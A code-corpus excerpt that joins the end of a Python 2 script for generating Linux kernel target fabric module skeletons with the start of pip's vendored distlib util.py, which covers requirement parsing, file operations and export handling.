buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!(nacl)) {\n"
buf += " printk(KERN_ERR \"Unable to alocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('release_cmd_to_pool', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('new_cmd_failure\)\(', fo):
buf += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_new_cmd_failure(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
if re.search('pack_lun\)\(', fo):
buf += "u64 " + fabric_mod_name + "_pack_lun(unsigned int lun)\n"
buf += "{\n"
buf += " WARN_ON(lun >= 256);\n"
buf += " /* Caller wants this byte-swapped */\n"
buf += " return cpu_to_le64((lun & 0xff) << 8);\n"
buf += "}\n\n"
bufi += "u64 " + fabric_mod_name + "_pack_lun(unsigned int);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
|
kenshay/ImageScripter | refs/heads/master | Script_Runner/PYTHON/Lib/site-packages/pip/_vendor/distlib/util.py | 24 | #
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, urljoin, httplib, xmlrpclib,
splittype, HTTPHandler, BaseConfigurator, valid_ident,
Container, configparser, URLError, ZipFile, fsdecode,
unquote, urlparse)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
IDENTIFIER = re.compile(r'^([\w\.-]+)\s*')
VERSION_IDENTIFIER = re.compile(r'^([\w\.*+-]+)\s*')
COMPARE_OP = re.compile(r'^(<=?|>=?|={2,3}|[~!]=)\s*')
MARKER_OP = re.compile(r'^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*')
OR = re.compile(r'^or\b\s*')
AND = re.compile(r'^and\b\s*')
NON_SPACE = re.compile(r'(\S+)\s*')
STRING_CHUNK = re.compile(r'([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)')
def parse_marker(marker_string):
"""
Parse a marker string and return a dictionary containing a marker expression.
The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
the expression grammar, or strings. A string contained in quotes is to be
interpreted as a literal string, and a string not contained in quotes is a
variable (such as os_name).
"""
def marker_var(remaining):
# either identifier, or literal string
m = IDENTIFIER.match(remaining)
if m:
result = m.groups()[0]
remaining = remaining[m.end():]
elif not remaining:
raise SyntaxError('unexpected end of input')
else:
q = remaining[0]
if q not in '\'"':
raise SyntaxError('invalid expression: %s' % remaining)
oq = '\'"'.replace(q, '')
remaining = remaining[1:]
parts = [q]
while remaining:
# either a string chunk, or oq, or q to terminate
if remaining[0] == q:
break
elif remaining[0] == oq:
parts.append(oq)
remaining = remaining[1:]
else:
m = STRING_CHUNK.match(remaining)
if not m:
raise SyntaxError('error in string literal: %s' % remaining)
parts.append(m.groups()[0])
remaining = remaining[m.end():]
else:
s = ''.join(parts)
raise SyntaxError('unterminated string: %s' % s)
parts.append(q)
result = ''.join(parts)
remaining = remaining[1:].lstrip() # skip past closing quote
return result, remaining
def marker_expr(remaining):
if remaining and remaining[0] == '(':
result, remaining = marker(remaining[1:].lstrip())
if remaining[0] != ')':
raise SyntaxError('unterminated parenthesis: %s' % remaining)
remaining = remaining[1:].lstrip()
else:
lhs, remaining = marker_var(remaining)
while remaining:
m = MARKER_OP.match(remaining)
if not m:
break
op = m.groups()[0]
remaining = remaining[m.end():]
rhs, remaining = marker_var(remaining)
lhs = {'op': op, 'lhs': lhs, 'rhs': rhs}
result = lhs
return result, remaining
def marker_and(remaining):
lhs, remaining = marker_expr(remaining)
while remaining:
m = AND.match(remaining)
if not m:
break
remaining = remaining[m.end():]
rhs, remaining = marker_expr(remaining)
lhs = {'op': 'and', 'lhs': lhs, 'rhs': rhs}
return lhs, remaining
def marker(remaining):
lhs, remaining = marker_and(remaining)
while remaining:
m = OR.match(remaining)
if not m:
break
remaining = remaining[m.end():]
rhs, remaining = marker_and(remaining)
lhs = {'op': 'or', 'lhs': lhs, 'rhs': rhs}
return lhs, remaining
return marker(marker_string)
def parse_requirement(req):
"""
Parse a requirement passed in as a string. Return a Container
whose attributes contain the various parts of the requirement.
"""
remaining = req.strip()
if not remaining or remaining.startswith('#'):
return None
m = IDENTIFIER.match(remaining)
if not m:
raise SyntaxError('name expected: %s' % remaining)
distname = m.groups()[0]
remaining = remaining[m.end():]
extras = mark_expr = versions = uri = None
if remaining and remaining[0] == '[':
i = remaining.find(']', 1)
if i < 0:
raise SyntaxError('unterminated extra: %s' % remaining)
s = remaining[1:i]
remaining = remaining[i + 1:].lstrip()
extras = []
while s:
m = IDENTIFIER.match(s)
if not m:
raise SyntaxError('malformed extra: %s' % s)
extras.append(m.groups()[0])
s = s[m.end():]
if not s:
break
if s[0] != ',':
raise SyntaxError('comma expected in extras: %s' % s)
s = s[1:].lstrip()
if not extras:
extras = None
if remaining:
if remaining[0] == '@':
# it's a URI
remaining = remaining[1:].lstrip()
m = NON_SPACE.match(remaining)
if not m:
raise SyntaxError('invalid URI: %s' % remaining)
uri = m.groups()[0]
t = urlparse(uri)
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not (t.scheme and t.netloc):
raise SyntaxError('Invalid URL: %s' % uri)
remaining = remaining[m.end():].lstrip()
else:
def get_versions(ver_remaining):
"""
Return a list of operator, version tuples if any are
specified, else None.
"""
m = COMPARE_OP.match(ver_remaining)
versions = None
if m:
versions = []
while True:
op = m.groups()[0]
ver_remaining = ver_remaining[m.end():]
m = VERSION_IDENTIFIER.match(ver_remaining)
if not m:
raise SyntaxError('invalid version: %s' % ver_remaining)
v = m.groups()[0]
versions.append((op, v))
ver_remaining = ver_remaining[m.end():]
if not ver_remaining or ver_remaining[0] != ',':
break
ver_remaining = ver_remaining[1:].lstrip()
m = COMPARE_OP.match(ver_remaining)
if not m:
raise SyntaxError('invalid constraint: %s' % ver_remaining)
if not versions:
versions = None
return versions, ver_remaining
if remaining[0] != '(':
versions, remaining = get_versions(remaining)
else:
i = remaining.find(')', 1)
if i < 0:
raise SyntaxError('unterminated parenthesis: %s' % remaining)
s = remaining[1:i]
remaining = remaining[i + 1:].lstrip()
# As a special diversion from PEP 508, allow a version number
# a.b.c in parentheses as a synonym for ~= a.b.c (because this
# is allowed in earlier PEPs)
if COMPARE_OP.match(s):
versions, _ = get_versions(s)
else:
m = VERSION_IDENTIFIER.match(s)
if not m:
raise SyntaxError('invalid constraint: %s' % s)
v = m.groups()[0]
s = s[m.end():].lstrip()
if s:
raise SyntaxError('invalid constraint: %s' % s)
versions = [('~=', v)]
if remaining:
if remaining[0] != ';':
raise SyntaxError('invalid requirement: %s' % remaining)
remaining = remaining[1:].lstrip()
mark_expr, remaining = parse_marker(remaining)
if remaining and remaining[0] != '#':
raise SyntaxError('unexpected trailing data: %s' % remaining)
if not versions:
rs = distname
else:
rs = '%s %s' % (distname, ', '.join(['%s %s' % con for con in versions]))
return Container(name=distname, extras=extras, constraints=versions,
marker=mark_expr, url=uri, requirement=rs)
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(root, path):
# normalizes and returns a lstripped-/-separated path
root = root.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(root)
return path[len(root):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata['extensions']['python.exports']['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self): # pragma: no cover
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException("Invalid specification "
"'%s'" % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException("Invalid specification "
"'%s'" % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException("Invalid specification "
"'%s'" % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
